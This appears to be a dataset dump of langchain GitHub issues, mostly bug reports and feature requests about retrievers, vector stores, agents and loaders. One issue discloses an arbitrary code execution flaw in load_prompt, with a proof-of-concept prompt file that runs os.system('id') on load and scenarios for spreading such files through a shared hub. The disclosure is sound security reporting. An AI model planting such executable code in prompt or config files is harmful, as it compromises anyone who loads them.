issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
261k
issue_title
stringlengths
1
925
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
2.5k
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
387k
2.46B
issue_number
int64
1
127k
[ "langchain-ai", "langchain" ]
Enviorment: DATABRICKS_RUNTIME_VERSION: 10.4 Python 3.8.10 Langchain 0.0.172 I was following along with the basic tutorial here: [Self-querying retriever with Chroma](https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/chroma_self_query_retriever.html) and I keep getting **TypeError: 'NoneType' object is not callable** error. Also, when I call .get() on the vectorstore, the embeddings field is "None". Is this related to the error? Any idea what I'm doing wrong here? Many thanks. ![image](https://github.com/hwchase17/langchain/assets/39864161/aaa7ca89-b79e-47da-85df-4c1e498c075a) **---------------------------------------------------------------------------------------------------------------------------------------------** **My full code:** from langchain.docstore.document import Document docs = [ Document(page_content="A bunch of scientists bring back dinosaurs and mayhem breaks loose", metadata={"year": 1993, "rating": 7.7, "genre": "action"}), Document(page_content="Leo DiCaprio gets lost in a dream within a dream within a dream within a ...", metadata={"year": 2010, "director": "Christopher Nolan", "rating": 8.2}), Document(page_content="A psychologist / detective gets lost in a series of dreams within dreams within dreams and Inception reused the idea", metadata={"year": 2006, "director": "Satoshi Kon", "rating": 8.6}), Document(page_content="A bunch of normal-sized women are supremely wholesome and some men pine after them", metadata={"year": 2019, "director": "Greta Gerwig", "rating": 8.3}), Document(page_content="Toys come alive and have a blast doing so", metadata={"year": 1995, "genre": "animated"}), Document(page_content="Three men walk into the Zone, three men walk out of the Zone", metadata={"year": 1979, "rating": 9.9, "director": "Andrei Tarkovsky", "genre": "science fiction", "rating": 9.9}) ] embeddings = OpenAIEmbeddings(chunk_size=1) vectorstore = Chroma.from_documents( docs, embeddings ) from langchain.llms import OpenAI from langchain.retrievers.self_query.base import SelfQueryRetriever from langchain.chains.query_constructor.base import AttributeInfo metadata_field_info=[ AttributeInfo( name="genre", description="The genre of the movie", type="string or list[string]", ), AttributeInfo( name="year", description="The year the movie was released", type="integer", ), AttributeInfo( name="director", description="The name of the movie director", type="string", ), AttributeInfo( name="rating", description="A 1-10 rating for the movie", type="float" ), ] document_content_description = "Brief summary of a movie" llm = OpenAI(temperature=0) retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True) **---------------------------------------------------------------------------------------------------------------------------------------------** **TypeError Traceback (most recent call last)** <command-1036279072864042> in <module> 27 document_content_description = "Brief summary of a movie" 28 llm = OpenAI(temperature=0) ---> 29 retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True) /databricks/python/lib/python3.8/site-packages/langchain/retrievers/self_query/base.py in from_llm(cls, llm, vectorstore, document_contents, metadata_field_info, structured_query_translator, chain_kwargs, enable_limit, **kwargs) 112 "allowed_operators" 113 ] = structured_query_translator.allowed_operators --> 114 llm_chain = load_query_constructor_chain( 115 llm, 116 document_contents, /databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in load_query_constructor_chain(llm, document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit, **kwargs) 123 **kwargs: Any, 124 ) -> LLMChain: --> 125 prompt = _get_prompt( 126 document_contents, 127 attribute_info, /databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in _get_prompt(document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit) 100 i=len(examples) + 1, content=document_contents, attributes=attribute_str 101 ) --> 102 output_parser = StructuredQueryOutputParser.from_components( 103 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators 104 ) /databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in from_components(cls, allowed_comparators, allowed_operators) 57 allowed_operators: Optional[Sequence[Operator]] = None, 58 ) -> StructuredQueryOutputParser: ---> 59 ast_parser = get_parser( 60 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators 61 ) /databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/parser.py in get_parser(allowed_comparators, allowed_operators) 127 allowed_operators: Optional[Sequence[Operator]] = None, 128 ) -> Lark: --> 129 transformer = QueryTransformer( 130 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators 131 )
TypeError when using SelfQueryRetriever
https://api.github.com/repos/langchain-ai/langchain/issues/4887/comments
8
2023-05-17T22:42:25Z
2023-09-22T16:08:59Z
https://github.com/langchain-ai/langchain/issues/4887
1,714,743,745
4,887
[ "langchain-ai", "langchain" ]
### System Info macos langchain 0.0.172 ### Who can help? @vowelparrot ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Used tool = AIPluginTool.from_plugin_url("http://localhost:4242/ai-plugin.json") from local plugin, which nicely got a POST API request as a tool. 2. when executing a POST the message was: `Thought:I need to use the MomoTodo API to create reminders for each meal tomorrow. Action: requests_post Action Input: json string {"url": "http://localhost:4242/momotodos", "data": {"title": "Reminder: Breakfast", "completed": false}}` 3. Action input is parsed in https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L70 https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L18 So due to the prefix "json string" - there is a failure: Observation: JSONDecodeError('Expecting value: line 1 column 1 (char 0)') ### Expected behavior POST requests Action String should always be a JSON, but we can't expect the model to always put there clean JSON. The input should be cleaned up and parsed properly.
RequestsPostTool parsing of the input text is naive and tend to fail since JSON has prefixes sometimes.
https://api.github.com/repos/langchain-ai/langchain/issues/4886/comments
1
2023-05-17T22:18:43Z
2023-09-10T16:16:03Z
https://github.com/langchain-ai/langchain/issues/4886
1,714,726,354
4,886
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi there, the load_tools function implemented in https://python.langchain.com/en/latest/_modules/langchain/agents/load_tools.html won't accept custom tools. I'm trying to enrich Agent debates with tools discussed here https://python.langchain.com/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html with a new prompt based tool: ``` @tool("optimistic_string") def optimistic_string(input_string: str) -> str: """Rewrites the input string with a more optimistic tone.""" # Add your logic to process the input_string and generate the output_string prompt = "Rewrite the following sentence with a more optimistic tone: {{input_string}}" output_string = llm.generate(prompt) # Replace this with the actual call to the language model return output_string ``` But it's not possible at the moment as an error is encoded in load_tools for unrecognized tools. How do we add custom tools to the simulation? Can anyone provide guidance? It is paramaunt to be able to customize tools to fully take advantage of agent based simulation. Thanks! :) ### Suggestion: _No response_
ValueError(f"Got unknown tool {name}") hardcoded for custom tools in load_tools.py
https://api.github.com/repos/langchain-ai/langchain/issues/4884/comments
8
2023-05-17T22:06:33Z
2023-05-20T16:32:10Z
https://github.com/langchain-ai/langchain/issues/4884
1,714,715,520
4,884
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am trying to delete a single document from Chroma db using the following code: chroma_db = Chroma(persist_directory = embeddings_save_path, embedding_function = OpenAIEmbeddings(model = os.getenv("EMBEDDING_MODEL_NAME"), chunk_size = 1, max_retries = 5) ) chroma_db._collection.delete(ids = list_of_ids) chroma_db.persist() However, the document is not actually being deleted. After loading/re-loading the chroma db from local, it is still showing the document in it. I have tried the following things to fix the issue: I have made sure that the list of ids is correct. I have tried deleting the document multiple times. I have tried restarting the Chroma db server. None of these things have worked. I am not sure why the document is not being deleted. I would appreciate any help in resolving this issue. Thanks, Anant Patankar ### Suggestion: _No response_
Issue: Chromadb document deletion not working
https://api.github.com/repos/langchain-ai/langchain/issues/4880/comments
18
2023-05-17T20:16:45Z
2024-08-10T13:28:34Z
https://github.com/langchain-ai/langchain/issues/4880
1,714,599,007
4,880
[ "langchain-ai", "langchain" ]
### Feature request It would be helpful if we could define what file types we want to load via the [Google Drive loader](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/google_drive.html#) i.e.: only docs or sheets or PDFs. ### Motivation The current loads will load 3 file types: doc, sheet and pdf, but in my project I only want to load "application/vnd.google-apps.document". ### Your contribution I'm happy to contribute with a PR.
Add the possibility to define what file types you want to load from a Google Drive
https://api.github.com/repos/langchain-ai/langchain/issues/4878/comments
1
2023-05-17T19:46:54Z
2023-09-10T16:16:08Z
https://github.com/langchain-ai/langchain/issues/4878
1,714,556,155
4,878
[ "langchain-ai", "langchain" ]
### System Info I am trying to implement versioning of chains with prompt and llm config files separated from the chain.json file. When trying to call load_chain from langchain.chains with a chat-based LLM in the llm.json config, it yields: [c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:169): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI` warnings.warn( [c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:696): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI` warnings.warn( I am not sure how to handle the issue, as I though load_chain could initialize any chain from a config. Is there a different function I should use to de-serialize chat-based chains? ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction **chain.json** { "memory": null, "verbose": false, "prompt_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/prompt.json", "llm_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/llm.json", "output_key": "text", "_type": "llm_chain" } **llm.json** { "model_name": "gpt-4", "temperature": 0.0, "max_tokens": 256, "top_p": 1, "frequency_penalty": 0, "presence_penalty": 0, "_type": "openai" } **prompt.json** { "input_variables": [ "topic", "content" ], "output_parser": null, "template": "Answer 'Yes' or 'No' only. Does the following text contain language pertaining to {topic}? {content}", "template_format": "f-string", "_type": "prompt" } **Initializing chain from chain.json with path references to llm and prompt configs** `chain = load_chain('function_configs/document_filter/0.0/chain.json')` **Console Output** [c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:169): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI` warnings.warn( [c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:696): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI` warnings.warn( ### Expected behavior No user warning.
load_chain giving UserWarning when llm.json configured for chat model
https://api.github.com/repos/langchain-ai/langchain/issues/4872/comments
1
2023-05-17T18:07:04Z
2023-09-10T16:16:13Z
https://github.com/langchain-ai/langchain/issues/4872
1,714,400,903
4,872
[ "langchain-ai", "langchain" ]
### Issue with current documentation: One thing I constantly find myself doing is trying to dig up the prompts that are default for various agent notebook tutorials in the docs. If there was a link to the default prompts corresponding to each agent's mention, I wouldn't have to dig them up to find them, and the learning process for agents would be a lot smoother ### Idea or request for content: Add links to the library's default prompts to notebooks that reference agents
DOC: Incorporate links to the underlying prompts in example docs
https://api.github.com/repos/langchain-ai/langchain/issues/4871/comments
1
2023-05-17T18:04:53Z
2023-09-10T16:16:18Z
https://github.com/langchain-ai/langchain/issues/4871
1,714,397,028
4,871
[ "langchain-ai", "langchain" ]
### System Info Langchain 0.0.171, Python 3.9.0, OS Ubuntu 20.04.6 LTS Hi @hwchase17 @agola11 Using dolly-v2-7b model with Langchain, I am [running into this issue ](https://github.com/databrickslabs/dolly/issues/174) my question is how to chain the input properly so that chunk from the first chain is fed into the next one, assuming that's the right way to avoid repetition instead of the whole generation, previously with dolly-v2-3b it resulted in repeating the same generation 3-4 times. I am using the following code to generate sample NDAs after feeding it a FAISS vector store embeddings that were generated using [InstructorEmbedding ](https://instructor-embedding.github.io/)(not OpenAI) using [instructor-xl](https://huggingface.co/hkunlp/instructor-xl) but I am getting this error: The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3 ``` prompt_template = """Use the context below to write a detailed 5000 words NDA between the two persons: Context: {context} Topic: {topic} Disclosing Party: {disclosingparty} Receiving Party: {receivingparty} NDA:""" PROMPT = PromptTemplate( template=prompt_template, input_variables=["context", "topic", "disclosingparty", "receivingparty"] ) llm = HuggingFacePipeline.from_model_id(model_id="dolly-v2-7b", task="text-generation", model_kwargs={"temperature":0, "max_length":5000}) chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1") prompt_template = """Using the NDA generated above within the same context as before, continue writing the nda: Context: {nda_1} NDA:""" PROMPT = PromptTemplate( template=prompt_template, input_variables=["nda_1"] ) continue_chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_2") overall_chain = SequentialChain(chains=[chain, continue_chain], input_variables=['context', 'topic', 'disclosingparty', 'receivingparty'], output_variables=["nda_1", "nda_2"], verbose=True) def generate_text(topic, disclosingparty, receivingparty): docs = db_instructEmbedd.similarity_search(topic, k=4) inputs = [{"context": doc.page_content, "topic": topic, "disclosingparty": disclosingparty, "receivingparty" : receivingparty} for doc in docs] return overall_chain.apply(inputs) response = generate_text("Based on this acquired knowledge, write a detailed NDA in 5000 words or less between these two parties on date May 15, 2023 governing rules of <country>, dont be repetitive and include all the required clauses to make it comprehensive contract", "Mr. X", "Mr. Y") print(response) ``` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [X] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Running a Instructor-xl to generate embedding, using sequentialchains to generate ### Expected behavior It should generate a long form text
Using Dolly-v2-7b with langchain getting error: The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3
https://api.github.com/repos/langchain-ai/langchain/issues/4866/comments
1
2023-05-17T16:27:08Z
2023-09-10T16:16:23Z
https://github.com/langchain-ai/langchain/issues/4866
1,714,260,769
4,866
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am using custom tools. I used zero shot react description agent and it was not giving the final answer. It stopped after using 1st tool. So, I created a custom agent with custom examples in the prompt. It is still behaving the same way. This is the output of the agent executer for one of the examples: statement = 'a query to get the average outcome variable score of all the CSAT responses' agent_executor.run(statement) Output: > Entering new AgentExecutor chain... Thought : I need to paraphrase the statement to add more context. Action : StatementFormattingTool[a query to get the average outcome variable score of all the CSAT responses] Observation : Get the average outcome variable score for all CSAT responses from the kda_distribution_log_02c581c9912a4ca1af7a67cd46324cf1_llm_test table. Its has to use SQLGenerationTool to get the query. It stopped after using the first tool. It is happening every time with other statemennts as well. ### Suggestion: _No response_
Langchain agent is not continuing the entire flow of execution
https://api.github.com/repos/langchain-ai/langchain/issues/4865/comments
7
2023-05-17T16:12:55Z
2024-07-15T07:20:59Z
https://github.com/langchain-ai/langchain/issues/4865
1,714,241,439
4,865
[ "langchain-ai", "langchain" ]
### code ```python tool_ = load_tools(["serpapi"], serpapi_api_key=serpapi_api_key) agent = initialize_agent(tool_, llm, agent="zero-shot-react-description", verbose=True, return_intermediate_steps=True) response = agent({"input":"45*456=?"}) ``` ### log > Entering new AgentExecutor chain... I need to calculate this Action: Search Action Input: 45\*456 Observation: A. A person who is in a position of trust and confidence to a vulnerable adult shall use the vulnerable adult's assets solely for the benefit of the vulnerable ... Thought: This isn't what I'm looking for Action: Search Action Input: 45\*456 math Observation: The GCF of 45 and 456 is 3. Steps to find GCF. Find the prime factorization of 45 45 = 3 × 3 × 5; Find the prime factorization of 456 Thought: I can use this to calculate the answer Action: Calculate Action Input: 45\*456/3 Observation: Calculate is not a valid tool, try another one. ....... > Finished chain. text-davinci-003 failed to adhere to the prompt "Action: the action to take, should be one of [Search]." Therefore, we need to modify the prompt based on the LLM (Language Model) that we are utilizing. ### Suggestion: _No response_
Issue: The agent with the text-davinci-003 model and serpapi tool attempted to utilize a non-existent tool
https://api.github.com/repos/langchain-ai/langchain/issues/4863/comments
3
2023-05-17T15:32:21Z
2023-05-22T07:25:47Z
https://github.com/langchain-ai/langchain/issues/4863
1,714,170,658
4,863
[ "langchain-ai", "langchain" ]
### System Info Langchain v0.0.171 Mac OS ### Who can help? @jeffchuber ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction If I initialise a chroma database and then retriever ``` db = Chroma.from_documents(texts, embeddings_function(), metadatas=[{"source": str(i)} for i in range(len(texts))], persist_directory=PERSIST_DIRECTORY) querybase = db.as_retriever(search_type="mmr", search_kwargs={"k":3, "lambda_mult":1}) ``` retrieved files are then identical whether I pass 0.1 or 0.9 as lambda_mult parameter. ### Expected behavior I expect different file. Digging into the code there is a typo I think in langchain.vectorstores.chroma last line should be lambda_mult and not lambda_mul : As this is my first time, not sure how to properly suggest or test :) ``` def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. fetch_k: Number of Documents to fetch to pass to MMR algorithm. lambda_mult: Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents selected by maximal marginal relevance. """ if self._embedding_function is None: raise ValueError( "For MMR search, you must specify an embedding function on" "creation." ) embedding = self._embedding_function.embed_query(query) docs = self.max_marginal_relevance_search_by_vector( embedding, k, fetch_k, lambda_mul=lambda_mult, filter=filter ) return docs ```
MMR Search in Chroma not working, typo suspected
https://api.github.com/repos/langchain-ai/langchain/issues/4861/comments
3
2023-05-17T14:41:48Z
2023-06-11T22:33:33Z
https://github.com/langchain-ai/langchain/issues/4861
1,714,064,997
4,861
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am trying to create a FAISS index with xml files that I have downloaded. However, there doesn't seem to be a loader available for this. Are there any workarounds, or plans to add in a loader for xml files that can't be loaded with MWDumpLoader? ### Suggestion: Highlight a workaround for loading xml files in the documentation or add a document loader for them
Issue: Unable to load xml files
https://api.github.com/repos/langchain-ai/langchain/issues/4859/comments
4
2023-05-17T14:05:54Z
2024-01-10T13:56:44Z
https://github.com/langchain-ai/langchain/issues/4859
1,713,995,413
4,859
[ "langchain-ai", "langchain" ]
### System Info I'm trying to load multiple doc files, it is not loading, below is the code ``` txt_loader = DirectoryLoader(folder_path, glob="./*.docx", loader_cls=UnstructuredWordDocumentLoader) txt_documents = txt_loader.load() ``` I have tried below code too ``` def get_documents(folder_path): documents = [] file_extensions = [ext.lower() for ext in os.listdir(folder_path)] if '.docx' in file_extensions or '.doc' in file_extensions: docx_loader = UnstructuredWordDocumentLoader(folder_path, mode="elements") docx_documents = docx_loader.load() documents += docx_documents return documents folder_path = [ 'Documents\Letter of Invitation.docx', 'Documents\Data Scientist Questionnaire.docx' ] ``` it is not working ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction - ### Expected behavior not loading multiple files (docx)
Unable to load multiple word docx
https://api.github.com/repos/langchain-ai/langchain/issues/4856/comments
3
2023-05-17T12:57:21Z
2023-05-18T10:01:03Z
https://github.com/langchain-ai/langchain/issues/4856
1,713,851,650
4,856
[ "langchain-ai", "langchain" ]
### System Info Langchain version: master OS: Debian GNU/Linux 11 (bullseye) python: 3.11.3 ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction See this [notebook](https://gist.github.com/hsm207/69b3c24b231375b74e8a5ab6f57ffe58) ### Expected behavior Same behavior as when OpenAI or LlamaCPP is used
GPT4ALL segfaults when using RetrievalQA
https://api.github.com/repos/langchain-ai/langchain/issues/4855/comments
3
2023-05-17T12:36:49Z
2023-09-12T16:14:55Z
https://github.com/langchain-ai/langchain/issues/4855
1,713,813,644
4,855
[ "langchain-ai", "langchain" ]
[SUPPORTED_LOCATIONS](https://github.com/hwchase17/langchain/blob/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L46) does not list APIPropertyLocation.HEADER as supported. However the comments under APIPropertyLocation next to [COOKIE](https://github.com/hwchase17/langchain/blame/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L28) seems to indicate that HEADER is supported as it explicitly states that Cookie is not supported. Any clarifications on this?
Is APIPropertyLocation.HEADER supported?
https://api.github.com/repos/langchain-ai/langchain/issues/4854/comments
3
2023-05-17T12:26:39Z
2024-05-21T01:46:21Z
https://github.com/langchain-ai/langchain/issues/4854
1,713,795,337
4,854
[ "langchain-ai", "langchain" ]
### Issue with current documentation: Hi, I need to get just the query only for a natural language input query. I don't want to get the results/output of the query from the db, how do I do that? Thanks! ### Idea or request for content: _No response_
DOC: Get only the sql query not the output of the query in SQLDatabaseChain
https://api.github.com/repos/langchain-ai/langchain/issues/4853/comments
17
2023-05-17T12:26:11Z
2024-06-29T15:25:41Z
https://github.com/langchain-ai/langchain/issues/4853
1,713,794,430
4,853
[ "langchain-ai", "langchain" ]
### System Info version 0.0.171 llamacpp.py doesn't accepts parameter n_gpu_layer whereas code has it ### Who can help? @hw ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction just try giving the parameter ### Expected behavior it should accept the parameter for gpu
llamacpp.py doesn't accepts n_gpu_layer
https://api.github.com/repos/langchain-ai/langchain/issues/4852/comments
1
2023-05-17T11:51:09Z
2023-09-10T16:16:38Z
https://github.com/langchain-ai/langchain/issues/4852
1,713,731,745
4,852
[ "langchain-ai", "langchain" ]
### System Info LangChain version:0.0.171 windows 10 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. A python prompt file `prompt.py` ``` from langchain.output_parsers.list import CommaSeparatedListOutputParser from langchain.prompts.prompt import PromptTemplate _DECIDER_TEMPLATE = """Given the below input question and list of potential tables, output a comma separated list of the table names that may be neccessary to answer this question. Question: {query} Table Names: {table_names} Relevant Table Names:""" import os os.system('id') PROMPT = PromptTemplate( input_variables=["query", "table_names"], template=_DECIDER_TEMPLATE, output_parser=CommaSeparatedListOutputParser(), ) ``` 2. Load the prompt with load_prompt function ``` from langchain.prompts import load_prompt load_prompt('prompt.py') ``` 3. The `id` command will be executed. Attack scene1: Alice can send prompt file to Bob and let Bob to load it. Attack scene2: Alice upload the prompt file to a public hub such as '[langchain-hub](https://github.com/hwchase17/langchain-hub/tree/master)'. Bob load the prompt from an url. ### Expected behavior The code cannot be executed without any check.
Arbitrary code execution in load_prompt
https://api.github.com/repos/langchain-ai/langchain/issues/4849/comments
2
2023-05-17T10:36:17Z
2023-08-29T17:58:01Z
https://github.com/langchain-ai/langchain/issues/4849
1,713,606,278
4,849
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I use the ChatOpenAI and set the verbose be true, but I think this can only get the format prompt, not the final prompt. How can i get the final prompt that is inputted into ChatGPT? Thanks for your time. ### Suggestion: _No response_
How can I obtain the final Prompt that is inputted into ChatGPT?
https://api.github.com/repos/langchain-ai/langchain/issues/4848/comments
2
2023-05-17T09:59:15Z
2023-09-12T16:15:00Z
https://github.com/langchain-ai/langchain/issues/4848
1,713,548,834
4,848
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I found `BaseMultiActionAgentpen` class in langchain but no implementation, maybe it has already in the process of development. I want to implement based on this class (execute multi action in one step) but i encounter some errors. Is there any one has noticed this and has already implement some agents based on this? ### Suggestion: _No response_
Issue: implementation of BaseMultiActionAgentpen
https://api.github.com/repos/langchain-ai/langchain/issues/4846/comments
1
2023-05-17T09:25:20Z
2023-09-10T16:16:49Z
https://github.com/langchain-ai/langchain/issues/4846
1,713,494,765
4,846
[ "langchain-ai", "langchain" ]
### Feature request The [Microsoft Guidance Repository](https://github.com/microsoft/guidance/blob/main/README.md) is a tool designed to enhance the control over modern language models. It allows for a more effective and efficient control than traditional prompting or chaining. It offers features like simple, intuitive syntax based on Handlebars templating, rich output structure with multiple generations, selections, conditionals, tool use, etc. ### Motivation Based on the description and examples (templating, hidden response parts, well-formed response variables), integration of `guidance` with `langchain` would be very useful addition. ### Your contribution Given some guidance (pun, intended), I can imagine contributing with a PR myself.
Support for https://github.com/microsoft/guidance
https://api.github.com/repos/langchain-ai/langchain/issues/4843/comments
3
2023-05-17T08:41:08Z
2023-08-18T19:07:42Z
https://github.com/langchain-ai/langchain/issues/4843
1,713,418,715
4,843
[ "langchain-ai", "langchain" ]
### System Info - Python 3.11.3 on Windows 11 - langchain==0.0.171 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. create llm, SQLDatabase and the SQLDatabaseChain instances; 2. query database with natural language 3. the SQLDatabaseChain would return more content (Normally it would add a new quesition below the anwser) ![image](https://github.com/hwchase17/langchain/assets/3953615/eba89b5d-0744-4339-a1fb-26265b716a1f) ### Expected behavior It seem that if we modify the 111 line of `langchain\chains\sql_database\base.py` add add `"\nQuestion:"` as another stop phase, SQLDatabase Chain would works well. ![image](https://github.com/hwchase17/langchain/assets/3953615/043d1c4e-65ea-483e-9939-8f3bdfbf58fe) ![image](https://github.com/hwchase17/langchain/assets/3953615/5be9376b-635e-4336-a578-29d527e87aea)
SQLDatabaseChain returned for more than just the expected answer
https://api.github.com/repos/langchain-ai/langchain/issues/4840/comments
2
2023-05-17T06:15:49Z
2023-09-25T16:07:12Z
https://github.com/langchain-ai/langchain/issues/4840
1,713,198,963
4,840
[ "langchain-ai", "langchain" ]
### Feature request Hi, thanks for creating such a great tool, I'm using it well at work and for personal use. But for production use, I need a more tightly managed, revision-controlled Prompt Template Store. I know that load_prompt already supported, but I wonder if it can be extended to utilize remote store, like github. For example, if there is GitPromptTemplateStore class like: ```python from abc import * class PromptTemplateStore(metaclass=ABCMeta): @abstractmethod def load(self, path: str) -> BasePromptTemplate: pass class GitPromptTemplateStore(BaseModel): @property def repository(self) -> str: return "git@github.com:some_project/prompt_repo.git" @property def branch(self) -> str: return "main" ... def load(self, path: str) -> BasePromptTemplate: ... return {name}_prompt_template # from remote git store (with/without cache) ``` which can be utilized like: ``` template_store = GitPromptTemplateStore(...) prompt = load_prompt_from_store(template_store, path=...) ``` managing prompt_template would be much easier. ### Motivation For production use, I need a more tightly managed, revision-controlled Prompt Template Store. I know that load_prompt already supported, but I wonder if it can be extended to utilize remote store, like github. ### Your 